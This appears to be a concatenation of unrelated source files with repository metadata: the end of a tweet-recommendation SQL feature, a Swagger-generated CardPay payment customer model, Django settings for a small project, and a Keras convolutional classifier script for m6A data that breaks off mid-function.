(tweet_gap.gap_576 * user_surfacing_tweet_vectors.gap_576) +
(tweet_gap.gap_577 * user_surfacing_tweet_vectors.gap_577) +
(tweet_gap.gap_578 * user_surfacing_tweet_vectors.gap_578) +
(tweet_gap.gap_579 * user_surfacing_tweet_vectors.gap_579) +
(tweet_gap.gap_580 * user_surfacing_tweet_vectors.gap_580) +
(tweet_gap.gap_581 * user_surfacing_tweet_vectors.gap_581) +
(tweet_gap.gap_582 * user_surfacing_tweet_vectors.gap_582) +
(tweet_gap.gap_583 * user_surfacing_tweet_vectors.gap_583) +
(tweet_gap.gap_584 * user_surfacing_tweet_vectors.gap_584) +
(tweet_gap.gap_585 * user_surfacing_tweet_vectors.gap_585) +
(tweet_gap.gap_586 * user_surfacing_tweet_vectors.gap_586) +
(tweet_gap.gap_587 * user_surfacing_tweet_vectors.gap_587) +
(tweet_gap.gap_588 * user_surfacing_tweet_vectors.gap_588) +
(tweet_gap.gap_589 * user_surfacing_tweet_vectors.gap_589) +
(tweet_gap.gap_590 * user_surfacing_tweet_vectors.gap_590) +
(tweet_gap.gap_591 * user_surfacing_tweet_vectors.gap_591) +
(tweet_gap.gap_592 * user_surfacing_tweet_vectors.gap_592) +
(tweet_gap.gap_593 * user_surfacing_tweet_vectors.gap_593) +
(tweet_gap.gap_594 * user_surfacing_tweet_vectors.gap_594) +
(tweet_gap.gap_595 * user_surfacing_tweet_vectors.gap_595) +
(tweet_gap.gap_596 * user_surfacing_tweet_vectors.gap_596) +
(tweet_gap.gap_597 * user_surfacing_tweet_vectors.gap_597) +
(tweet_gap.gap_598 * user_surfacing_tweet_vectors.gap_598) +
(tweet_gap.gap_599 * user_surfacing_tweet_vectors.gap_599) +
(tweet_gap.gap_600 * user_surfacing_tweet_vectors.gap_600) +
(tweet_gap.gap_601 * user_surfacing_tweet_vectors.gap_601) +
(tweet_gap.gap_602 * user_surfacing_tweet_vectors.gap_602) +
(tweet_gap.gap_603 * user_surfacing_tweet_vectors.gap_603) +
(tweet_gap.gap_604 * user_surfacing_tweet_vectors.gap_604) +
(tweet_gap.gap_605 * user_surfacing_tweet_vectors.gap_605) +
(tweet_gap.gap_606 * user_surfacing_tweet_vectors.gap_606) +
(tweet_gap.gap_607 * user_surfacing_tweet_vectors.gap_607) +
(tweet_gap.gap_608 * user_surfacing_tweet_vectors.gap_608) +
(tweet_gap.gap_609 * user_surfacing_tweet_vectors.gap_609) +
(tweet_gap.gap_610 * user_surfacing_tweet_vectors.gap_610) +
(tweet_gap.gap_611 * user_surfacing_tweet_vectors.gap_611) +
(tweet_gap.gap_612 * user_surfacing_tweet_vectors.gap_612) +
(tweet_gap.gap_613 * user_surfacing_tweet_vectors.gap_613) +
(tweet_gap.gap_614 * user_surfacing_tweet_vectors.gap_614) +
(tweet_gap.gap_615 * user_surfacing_tweet_vectors.gap_615) +
(tweet_gap.gap_616 * user_surfacing_tweet_vectors.gap_616) +
(tweet_gap.gap_617 * user_surfacing_tweet_vectors.gap_617) +
(tweet_gap.gap_618 * user_surfacing_tweet_vectors.gap_618) +
(tweet_gap.gap_619 * user_surfacing_tweet_vectors.gap_619) +
(tweet_gap.gap_620 * user_surfacing_tweet_vectors.gap_620) +
(tweet_gap.gap_621 * user_surfacing_tweet_vectors.gap_621) +
(tweet_gap.gap_622 * user_surfacing_tweet_vectors.gap_622) +
(tweet_gap.gap_623 * user_surfacing_tweet_vectors.gap_623) +
(tweet_gap.gap_624 * user_surfacing_tweet_vectors.gap_624) +
(tweet_gap.gap_625 * user_surfacing_tweet_vectors.gap_625) +
(tweet_gap.gap_626 * user_surfacing_tweet_vectors.gap_626) +
(tweet_gap.gap_627 * user_surfacing_tweet_vectors.gap_627) +
(tweet_gap.gap_628 * user_surfacing_tweet_vectors.gap_628) +
(tweet_gap.gap_629 * user_surfacing_tweet_vectors.gap_629) +
(tweet_gap.gap_630 * user_surfacing_tweet_vectors.gap_630) +
(tweet_gap.gap_631 * user_surfacing_tweet_vectors.gap_631) +
(tweet_gap.gap_632 * user_surfacing_tweet_vectors.gap_632) +
(tweet_gap.gap_633 * user_surfacing_tweet_vectors.gap_633) +
(tweet_gap.gap_634 * user_surfacing_tweet_vectors.gap_634) +
(tweet_gap.gap_635 * user_surfacing_tweet_vectors.gap_635) +
(tweet_gap.gap_636 * user_surfacing_tweet_vectors.gap_636) +
(tweet_gap.gap_637 * user_surfacing_tweet_vectors.gap_637) +
(tweet_gap.gap_638 * user_surfacing_tweet_vectors.gap_638) +
(tweet_gap.gap_639 * user_surfacing_tweet_vectors.gap_639) +
(tweet_gap.gap_640 * user_surfacing_tweet_vectors.gap_640) +
(tweet_gap.gap_641 * user_surfacing_tweet_vectors.gap_641) +
(tweet_gap.gap_642 * user_surfacing_tweet_vectors.gap_642) +
(tweet_gap.gap_643 * user_surfacing_tweet_vectors.gap_643) +
(tweet_gap.gap_644 * user_surfacing_tweet_vectors.gap_644) +
(tweet_gap.gap_645 * user_surfacing_tweet_vectors.gap_645) +
(tweet_gap.gap_646 * user_surfacing_tweet_vectors.gap_646) +
(tweet_gap.gap_647 * user_surfacing_tweet_vectors.gap_647) +
(tweet_gap.gap_648 * user_surfacing_tweet_vectors.gap_648) +
(tweet_gap.gap_649 * user_surfacing_tweet_vectors.gap_649) +
(tweet_gap.gap_650 * user_surfacing_tweet_vectors.gap_650) +
(tweet_gap.gap_651 * user_surfacing_tweet_vectors.gap_651) +
(tweet_gap.gap_652 * user_surfacing_tweet_vectors.gap_652) +
(tweet_gap.gap_653 * user_surfacing_tweet_vectors.gap_653) +
(tweet_gap.gap_654 * user_surfacing_tweet_vectors.gap_654) +
(tweet_gap.gap_655 * user_surfacing_tweet_vectors.gap_655) +
(tweet_gap.gap_656 * user_surfacing_tweet_vectors.gap_656) +
(tweet_gap.gap_657 * user_surfacing_tweet_vectors.gap_657) +
(tweet_gap.gap_658 * user_surfacing_tweet_vectors.gap_658) +
(tweet_gap.gap_659 * user_surfacing_tweet_vectors.gap_659) +
(tweet_gap.gap_660 * user_surfacing_tweet_vectors.gap_660) +
(tweet_gap.gap_661 * user_surfacing_tweet_vectors.gap_661) +
(tweet_gap.gap_662 * user_surfacing_tweet_vectors.gap_662) +
(tweet_gap.gap_663 * user_surfacing_tweet_vectors.gap_663) +
(tweet_gap.gap_664 * user_surfacing_tweet_vectors.gap_664) +
(tweet_gap.gap_665 * user_surfacing_tweet_vectors.gap_665) +
(tweet_gap.gap_666 * user_surfacing_tweet_vectors.gap_666) +
(tweet_gap.gap_667 * user_surfacing_tweet_vectors.gap_667) +
(tweet_gap.gap_668 * user_surfacing_tweet_vectors.gap_668) +
(tweet_gap.gap_669 * user_surfacing_tweet_vectors.gap_669) +
(tweet_gap.gap_670 * user_surfacing_tweet_vectors.gap_670) +
(tweet_gap.gap_671 * user_surfacing_tweet_vectors.gap_671) +
(tweet_gap.gap_672 * user_surfacing_tweet_vectors.gap_672) +
(tweet_gap.gap_673 * user_surfacing_tweet_vectors.gap_673) +
(tweet_gap.gap_674 * user_surfacing_tweet_vectors.gap_674) +
(tweet_gap.gap_675 * user_surfacing_tweet_vectors.gap_675) +
(tweet_gap.gap_676 * user_surfacing_tweet_vectors.gap_676) +
(tweet_gap.gap_677 * user_surfacing_tweet_vectors.gap_677) +
(tweet_gap.gap_678 * user_surfacing_tweet_vectors.gap_678) +
(tweet_gap.gap_679 * user_surfacing_tweet_vectors.gap_679) +
(tweet_gap.gap_680 * user_surfacing_tweet_vectors.gap_680) +
(tweet_gap.gap_681 * user_surfacing_tweet_vectors.gap_681) +
(tweet_gap.gap_682 * user_surfacing_tweet_vectors.gap_682) +
(tweet_gap.gap_683 * user_surfacing_tweet_vectors.gap_683) +
(tweet_gap.gap_684 * user_surfacing_tweet_vectors.gap_684) +
(tweet_gap.gap_685 * user_surfacing_tweet_vectors.gap_685) +
(tweet_gap.gap_686 * user_surfacing_tweet_vectors.gap_686) +
(tweet_gap.gap_687 * user_surfacing_tweet_vectors.gap_687) +
(tweet_gap.gap_688 * user_surfacing_tweet_vectors.gap_688) +
(tweet_gap.gap_689 * user_surfacing_tweet_vectors.gap_689) +
(tweet_gap.gap_690 * user_surfacing_tweet_vectors.gap_690) +
(tweet_gap.gap_691 * user_surfacing_tweet_vectors.gap_691) +
(tweet_gap.gap_692 * user_surfacing_tweet_vectors.gap_692) +
(tweet_gap.gap_693 * user_surfacing_tweet_vectors.gap_693) +
(tweet_gap.gap_694 * user_surfacing_tweet_vectors.gap_694) +
(tweet_gap.gap_695 * user_surfacing_tweet_vectors.gap_695) +
(tweet_gap.gap_696 * user_surfacing_tweet_vectors.gap_696) +
(tweet_gap.gap_697 * user_surfacing_tweet_vectors.gap_697) +
(tweet_gap.gap_698 * user_surfacing_tweet_vectors.gap_698) +
(tweet_gap.gap_699 * user_surfacing_tweet_vectors.gap_699) +
(tweet_gap.gap_700 * user_surfacing_tweet_vectors.gap_700) +
(tweet_gap.gap_701 * user_surfacing_tweet_vectors.gap_701) +
(tweet_gap.gap_702 * user_surfacing_tweet_vectors.gap_702) +
(tweet_gap.gap_703 * user_surfacing_tweet_vectors.gap_703) +
(tweet_gap.gap_704 * user_surfacing_tweet_vectors.gap_704) +
(tweet_gap.gap_705 * user_surfacing_tweet_vectors.gap_705) +
(tweet_gap.gap_706 * user_surfacing_tweet_vectors.gap_706) +
(tweet_gap.gap_707 * user_surfacing_tweet_vectors.gap_707) +
(tweet_gap.gap_708 * user_surfacing_tweet_vectors.gap_708) +
(tweet_gap.gap_709 * user_surfacing_tweet_vectors.gap_709) +
(tweet_gap.gap_710 * user_surfacing_tweet_vectors.gap_710) +
(tweet_gap.gap_711 * user_surfacing_tweet_vectors.gap_711) +
(tweet_gap.gap_712 * user_surfacing_tweet_vectors.gap_712) +
(tweet_gap.gap_713 * user_surfacing_tweet_vectors.gap_713) +
(tweet_gap.gap_714 * user_surfacing_tweet_vectors.gap_714) +
(tweet_gap.gap_715 * user_surfacing_tweet_vectors.gap_715) +
(tweet_gap.gap_716 * user_surfacing_tweet_vectors.gap_716) +
(tweet_gap.gap_717 * user_surfacing_tweet_vectors.gap_717) +
(tweet_gap.gap_718 * user_surfacing_tweet_vectors.gap_718) +
(tweet_gap.gap_719 * user_surfacing_tweet_vectors.gap_719) +
(tweet_gap.gap_720 * user_surfacing_tweet_vectors.gap_720) +
(tweet_gap.gap_721 * user_surfacing_tweet_vectors.gap_721) +
(tweet_gap.gap_722 * user_surfacing_tweet_vectors.gap_722) +
(tweet_gap.gap_723 * user_surfacing_tweet_vectors.gap_723) +
(tweet_gap.gap_724 * user_surfacing_tweet_vectors.gap_724) +
(tweet_gap.gap_725 * user_surfacing_tweet_vectors.gap_725) +
(tweet_gap.gap_726 * user_surfacing_tweet_vectors.gap_726) +
(tweet_gap.gap_727 * user_surfacing_tweet_vectors.gap_727) +
(tweet_gap.gap_728 * user_surfacing_tweet_vectors.gap_728) +
(tweet_gap.gap_729 * user_surfacing_tweet_vectors.gap_729) +
(tweet_gap.gap_730 * user_surfacing_tweet_vectors.gap_730) +
(tweet_gap.gap_731 * user_surfacing_tweet_vectors.gap_731) +
(tweet_gap.gap_732 * user_surfacing_tweet_vectors.gap_732) +
(tweet_gap.gap_733 * user_surfacing_tweet_vectors.gap_733) +
(tweet_gap.gap_734 * user_surfacing_tweet_vectors.gap_734) +
(tweet_gap.gap_735 * user_surfacing_tweet_vectors.gap_735) +
(tweet_gap.gap_736 * user_surfacing_tweet_vectors.gap_736) +
(tweet_gap.gap_737 * user_surfacing_tweet_vectors.gap_737) +
(tweet_gap.gap_738 * user_surfacing_tweet_vectors.gap_738) +
(tweet_gap.gap_739 * user_surfacing_tweet_vectors.gap_739) +
(tweet_gap.gap_740 * user_surfacing_tweet_vectors.gap_740) +
(tweet_gap.gap_741 * user_surfacing_tweet_vectors.gap_741) +
(tweet_gap.gap_742 * user_surfacing_tweet_vectors.gap_742) +
(tweet_gap.gap_743 * user_surfacing_tweet_vectors.gap_743) +
(tweet_gap.gap_744 * user_surfacing_tweet_vectors.gap_744) +
(tweet_gap.gap_745 * user_surfacing_tweet_vectors.gap_745) +
(tweet_gap.gap_746 * user_surfacing_tweet_vectors.gap_746) +
(tweet_gap.gap_747 * user_surfacing_tweet_vectors.gap_747) +
(tweet_gap.gap_748 * user_surfacing_tweet_vectors.gap_748) +
(tweet_gap.gap_749 * user_surfacing_tweet_vectors.gap_749) +
(tweet_gap.gap_750 * user_surfacing_tweet_vectors.gap_750) +
(tweet_gap.gap_751 * user_surfacing_tweet_vectors.gap_751) +
(tweet_gap.gap_752 * user_surfacing_tweet_vectors.gap_752) +
(tweet_gap.gap_753 * user_surfacing_tweet_vectors.gap_753) +
(tweet_gap.gap_754 * user_surfacing_tweet_vectors.gap_754) +
(tweet_gap.gap_755 * user_surfacing_tweet_vectors.gap_755) +
(tweet_gap.gap_756 * user_surfacing_tweet_vectors.gap_756) +
(tweet_gap.gap_757 * user_surfacing_tweet_vectors.gap_757) +
(tweet_gap.gap_758 * user_surfacing_tweet_vectors.gap_758) +
(tweet_gap.gap_759 * user_surfacing_tweet_vectors.gap_759) +
(tweet_gap.gap_760 * user_surfacing_tweet_vectors.gap_760) +
(tweet_gap.gap_761 * user_surfacing_tweet_vectors.gap_761) +
(tweet_gap.gap_762 * user_surfacing_tweet_vectors.gap_762) +
(tweet_gap.gap_763 * user_surfacing_tweet_vectors.gap_763) +
(tweet_gap.gap_764 * user_surfacing_tweet_vectors.gap_764) +
(tweet_gap.gap_765 * user_surfacing_tweet_vectors.gap_765) +
(tweet_gap.gap_766 * user_surfacing_tweet_vectors.gap_766) +
(tweet_gap.gap_767 * user_surfacing_tweet_vectors.gap_767)
) as dot_product_of_engaged_tweet_and_engaging_user_surfacing_tweets
from {table_name} t
left join `recsys2020.pretrained_bert_gap` tweet_gap on t.tweet_id = tweet_gap.tweet_id
left join user_surfacing_tweet_vectors on t.engaging_user_id = user_surfacing_tweet_vectors.user_id
order by t.tweet_id, t.engaging_user_id
"""
if __name__ == "__main__":
BertSimilarityBetweenTweetAndEngagingSurfacingTweetVectorsFeature.main()
| [
"agatan039@gmail.com"
] | agatan039@gmail.com |
1cdbe0eee6a24955bbe72e9528b58437571dd39b | af0b56556b747233d9085eb51991806017e2a5eb | /cardpay/model/payment_response_customer.py | ba914e59a971e9191cee9c6f161144ad9508c0f5 | [
"MIT"
] | permissive | whereisthebabki/python-sdk-v3 | ab39809f911e80873550c44156882c8680cb6e96 | b756cd0761fc23cb095db4801baee53c00de9241 | refs/heads/master | 2020-06-22T01:02:44.377584 | 2019-07-18T13:30:26 | 2019-07-18T13:30:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,414 | py | # coding: utf-8
"""
CardPay REST API
Welcome to the CardPay REST API. The CardPay API uses HTTP verbs and a REST resources endpoint structure (see more info about REST). Request and response payloads are formatted as JSON. Merchant uses API to create payments, refunds, payouts or recurrings, check or update transaction status and get information about created transactions. In API authentication process based on OAuth 2.0 standard. For recent changes see changelog section. # noqa: E501
OpenAPI spec version: 3.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class PaymentResponseCustomer(object):
    """Customer details attached to a CardPay payment response.

    Originally produced by the swagger code generator; refactored to route
    every setter through one shared length-validation helper (the generated
    code duplicated the same check five times) and to drop the unnecessary
    ``six`` compatibility shim (``dict.items()`` iterates identically on
    Python 2 and 3).

    Attributes:
        swagger_types (dict): attribute name -> attribute type.
        attribute_map (dict): attribute name -> JSON key in the API definition.
    """

    swagger_types = {
        'email': 'str',
        'full_name': 'str',
        'id': 'str',
        'ip': 'str',
        'locale': 'str',
        'phone': 'str'
    }

    attribute_map = {
        'email': 'email',
        'full_name': 'full_name',
        'id': 'id',
        'ip': 'ip',
        'locale': 'locale',
        'phone': 'phone'
    }

    def __init__(self, email=None, full_name=None, id=None, ip=None, locale=None, phone=None):  # noqa: E501
        """PaymentResponseCustomer - a model defined in Swagger.

        All arguments are optional; a non-None value is assigned through the
        corresponding property setter so that it is length-validated.
        """
        self._email = None
        self._full_name = None
        self._id = None
        self._ip = None
        self._locale = None
        self._phone = None
        self.discriminator = None
        if email is not None:
            self.email = email
        if full_name is not None:
            self.full_name = full_name
        if id is not None:
            self.id = id
        if ip is not None:
            self.ip = ip
        if locale is not None:
            self.locale = locale
        if phone is not None:
            self.phone = phone

    @staticmethod
    def _check_length(field, value, min_length, max_length):
        """Raise ValueError unless value is None or min_length <= len(value) <= max_length.

        The messages replicate the ones emitted by the original generated
        per-setter checks, so any caller matching on them keeps working.
        """
        if value is None:
            return
        if len(value) > max_length:
            raise ValueError(
                "Invalid value for `%s`, length must be less than or equal to `%s`" % (field, max_length))  # noqa: E501
        if len(value) < min_length:
            raise ValueError(
                "Invalid value for `%s`, length must be greater than or equal to `%s`" % (field, min_length))  # noqa: E501

    @property
    def email(self):
        """str: Email address of the customer.

        Mandatory by default for 'Asia', 'Latin America', 'NETELLER',
        'DIRECTBANKINGNGA', 'AQRCODE', 'AIRTEL', 'MPESA', 'MTN',
        'UGANDAMOBILE', 'VODAFONE', 'TIGO' payment methods; can be defined
        as optional by the CardPay manager. Length 1..256 when present.
        """
        return self._email

    @email.setter
    def email(self, email):
        self._check_length("email", email, 1, 256)
        self._email = email

    @property
    def full_name(self):
        """str: Customer's full name (mandatory for the 'Asia' payment
        method only). Length 1..255 when present."""
        return self._full_name

    @full_name.setter
    def full_name(self, full_name):
        self._check_length("full_name", full_name, 1, 255)
        self._full_name = full_name

    @property
    def id(self):
        """str: Customer's ID in the merchant's system.

        Length at most 256 when present (the generated lower bound of 0 is
        vacuous but kept for message parity).
        """
        return self._id

    @id.setter
    def id(self, id):
        self._check_length("id", id, 0, 256)
        self._id = id

    @property
    def ip(self):
        """str: IP address of the customer; present only if the wallet
        (terminal) settings enable this option (disabled by default).
        Length 1..15 when present."""
        return self._ip

    @ip.setter
    def ip(self, ip):
        self._check_length("ip", ip, 1, 15)
        self._ip = ip

    @property
    def locale(self):
        """str: Preferred payment-page locale (ISO 639-1 language code).

        The default locale is applied if the selected one is unsupported.
        Supported locales: `ru`, `en`, `zh`, `ja`. Not length-validated.
        """
        return self._locale

    @locale.setter
    def locale(self, locale):
        self._locale = locale

    @property
    def phone(self):
        """str: Customer's phone number.

        Mandatory for 'Asia' and DIRECTBANKINGNGA payment methods; optional
        by default otherwise (may be made mandatory by the CardPay manager).
        Length 10..13 when present.
        """
        return self._phone

    @phone.setter
    def phone(self, phone):
        self._check_length("phone", phone, 10, 13)
        self._phone = phone

    def to_dict(self):
        """Return the model properties as a dict (None values omitted)."""
        result = {}

        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if value is not None:
                    result[attr] = value
        # Generated-code parity: merge dict items when the model subclasses
        # dict (never true for this class, but kept for uniformity).
        if issubclass(PaymentResponseCustomer, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Return the string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Return True if both objects are equal."""
        if not isinstance(other, PaymentResponseCustomer):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Return True if both objects are not equal."""
        return not self == other
| [
"rnd@cardpay.com"
] | rnd@cardpay.com |
3e5a3a1740c2c325383ba062154ff72b2ae80803 | c64f42286006cb0990cf002b07170b7b34773d6b | /ProTow/ProTow/settings.py | 42b6b83f3988641676084abcfa4f687b7de7d899 | [] | no_license | tlawren3/djangoclass | 5c489d0240021e22f2545ee85a374f82d818e657 | 65df31ccbc6e17ca14eb2697bda573c17aeaaac8 | refs/heads/master | 2020-04-08T21:13:21.087924 | 2018-11-29T22:26:34 | 2018-11-29T22:26:34 | 159,735,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,101 | py | """
Django settings for ProTow project.
Generated by 'django-admin startproject' using Django 2.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# TODO(review): this key is committed to source control; rotate it and load
# it from an environment variable (e.g. os.environ["SECRET_KEY"]) before any
# production deployment.
SECRET_KEY = '(#lnuan)ormzi%%+-9p!k@^f0^8-5*7@9le7gmz)bnvoj#^4p8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Must list the served hostnames once DEBUG is turned off.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'AppTwo'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ProTow.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ProTow.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"tlawren3@icloud.com"
] | tlawren3@icloud.com |
2933d2996ff2c284d1fd6b90cd4dfcbf24fdc883 | 8953c8dce654ae32a80adf873376ea5566daead7 | /eif3a_full_m6aReader.py | 5854751b65e91f4e21efdba142d57127f35c3467 | [] | no_license | yuxuanwu17/m6a_dp | 5e17e86b2ea2133e69beec0eab8abc7877d90276 | f3a5966f9abcce7077839024a71f01a139689967 | refs/heads/master | 2022-11-20T15:06:34.470254 | 2020-07-21T14:27:15 | 2020-07-21T14:27:15 | 280,642,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,201 | py | #%%
# To pkeras_model=None training, we import the necessary functions and submodules from keras
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers.core import Dropout, Reshape, Dense, Activation, Flatten
from keras.layers.convolutional import Conv1D, MaxPooling1D
from keras.optimizers import Adadelta, SGD, RMSprop;
import keras.losses;
from keras.constraints import maxnorm;
from keras.utils import normalize, to_categorical
from keras.layers.normalization import BatchNormalization
from keras import regularizers
from keras.callbacks import EarlyStopping, History, ModelCheckpoint
from keras import backend as K
import matplotlib.pyplot as plt
from matplotlib import pyplot
from sklearn.metrics import precision_score, recall_score, accuracy_score, f1_score, precision_recall_curve, auc
from pandas import DataFrame
#%%
def load_data():
    """Load the eIF3a test CSV and split it into train/test arrays plus labels.

    The CSV is expected to hold two encodings side by side: columns
    [2, n/2) form the training matrix and columns (n/2, n-1) the test
    matrix (the two leading columns, the middle separator column and the
    trailing column are skipped). A singleton "channel" axis is inserted so
    the Conv1D model downstream receives (rows, 1, features).

    Labels assume the first half of the rows are positives (1) and the
    second half negatives (0), returned as (k, 1) column vectors.

    Returns:
        (x_train, x_test, y_test, y_train) -- note the order: y_test comes
        before y_train, matching the existing callers.
    """
    df = pd.read_csv("eif3a_full_test_m6aReader.csv")
    n = len(df.columns)
    half = int(n / 2)
    x_train = df.iloc[:, 2:half]
    # Rows with missing values (shorter test set) are discarded.
    x_test = df.iloc[:, (half + 1):(n - 1)].dropna()
    x_train = np.expand_dims(x_train, axis=1)
    x_test = np.expand_dims(x_test, axis=1)
    # np.mat was removed in NumPy 2.0; build plain (k, 1) ndarrays instead
    # (Keras accepts these exactly like the old matrix transpose).
    y_train = np.array([1, 0]).repeat(int(df.shape[0] / 2)).reshape(-1, 1)
    y_test = np.array([1, 0]).repeat(int(x_test.shape[0] / 2)).reshape(-1, 1)
    return x_train, x_test, y_test, y_train
def precision(y_true, y_pred):
    """Batch-wise precision metric for Keras (TP / predicted positives).

    Rounds sigmoid outputs to {0, 1}; K.epsilon() guards against division
    by zero when nothing is predicted positive. Note this is averaged per
    batch by Keras, not computed globally over the epoch.
    """
    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))
    precision = true_positives / (predicted_positives + K.epsilon())
    return precision
def recall(y_true, y_pred):
    """Batch-wise recall metric for Keras (TP / actual positives)."""
    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))
    possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))
    recall = true_positives / (possible_positives + K.epsilon())
    return recall
#%%
def build_model(x_train):
    """Build and compile the two-block Conv1D binary classifier.

    Architecture: [Conv1D(90) -> ReLU -> MaxPool -> Dropout] x1,
    [Conv1D(100) -> ReLU -> MaxPool -> Dropout] x1, then
    Flatten -> Dense(1210) -> ReLU -> Dense(1) -> sigmoid.
    All kernels/pools use size 1, so the net acts per-position.

    :param x_train: training array; only its shape (minus the batch axis)
        is used to size the input layer
    :return: a compiled Keras Sequential model (binary cross-entropy, Adam,
        with accuracy plus the custom precision/recall metrics above)
    """
    one_filter_keras_model = Sequential()
    one_filter_keras_model.add(
        Conv1D(filters=90, kernel_size=1, padding="valid", kernel_regularizer=regularizers.l2(0.01),
               input_shape=x_train.shape[1::]))
    one_filter_keras_model.add(Activation('relu'))
    one_filter_keras_model.add(MaxPooling1D(pool_size=1, strides=1))
    one_filter_keras_model.add(Dropout(0.25))
    one_filter_keras_model.add(
        Conv1D(filters=100, kernel_size=1, padding="valid", kernel_regularizer=regularizers.l2(0.01)))
    one_filter_keras_model.add(Activation('relu'))
    one_filter_keras_model.add(MaxPooling1D(pool_size=1, strides=1))
    one_filter_keras_model.add(Dropout(0.25))
    one_filter_keras_model.add(Flatten())
    one_filter_keras_model.add(Dense(1210))
    one_filter_keras_model.add(Activation("relu"))
    one_filter_keras_model.add(Dense(1))
    one_filter_keras_model.add(Activation("sigmoid"))
    one_filter_keras_model.summary()
    one_filter_keras_model.compile(loss='binary_crossentropy', optimizer='adam',
                                   metrics=['accuracy', precision, recall])
    return one_filter_keras_model
#%%
def compileModel(model, x_train, x_test, y_test, y_train):
    """Train `model` on (x_train, y_train), validating on (x_test, y_test).

    Runs up to 100 epochs (batch size 128) with early stopping on validation
    loss (patience 10) and checkpoints the best weights to
    "weights.best.hdf5" by validation accuracy.

    :param model: compiled Keras model (see build_model)
    :return: the Keras History object returned by model.fit
    """
    # (Removed five no-op self-assignments `model = model`, `x_train = x_train`,
    # etc. -- they had no effect.)
    # NOTE(review): the two callbacks intentionally monitor different metrics
    # (val_loss vs val_accuracy) -- confirm this is desired.
    earlystop = EarlyStopping(monitor='val_loss',
                              min_delta=0,
                              patience=10,
                              verbose=1)
    filepath = "weights.best.hdf5"
    checkpoint = ModelCheckpoint(filepath, monitor='val_accuracy', verbose=1, save_best_only=True, mode='max')
    callbacks_list = [checkpoint, earlystop]
    epoch = 100
    batchsize = 128
    history = model.fit(x_train, y_train, batch_size=batchsize, epochs=epoch,
                        validation_data=(x_test, y_test),
                        callbacks=callbacks_list)
    return history
# ################################
# print('draw the loss plot')
# ###############################
def lossplot(history):
    """Plot training vs validation loss per epoch and save it as a PNG.

    NOTE(review): the output path is hard-coded to
    /home/yuxuan/dp/m6aReader/loss_m6areader.png -- confirm before reuse.
    The current figure is not cleared first (unlike roc/prcurve below),
    so earlier plots may leak into this one.
    """
    ori_val_Loss = history.history['val_loss']
    loss = history.history['loss']
    # 1-based epoch numbers for the x axis.
    epochs = np.arange(len(history.epoch)) + 1
    plt.plot(epochs, ori_val_Loss, label='val loss')
    plt.plot(epochs, loss, label='loss')
    plt.title("Effect of model capacity on validation loss\n")
    plt.xlabel('Epoch #')
    plt.ylabel('Validation Loss')
    plt.legend()
    # plt.show()
    plt.savefig('/home/yuxuan/dp/m6aReader/loss_m6areader.png')
    print("")
    print("The loss plot is saved \n")
def roc(model, x_test, y_test):
    """Draw the ROC curve for `model` on the test set; return the AUROC.

    Saves the figure to a hard-coded path under /home/yuxuan/dp/m6aReader/.
    """
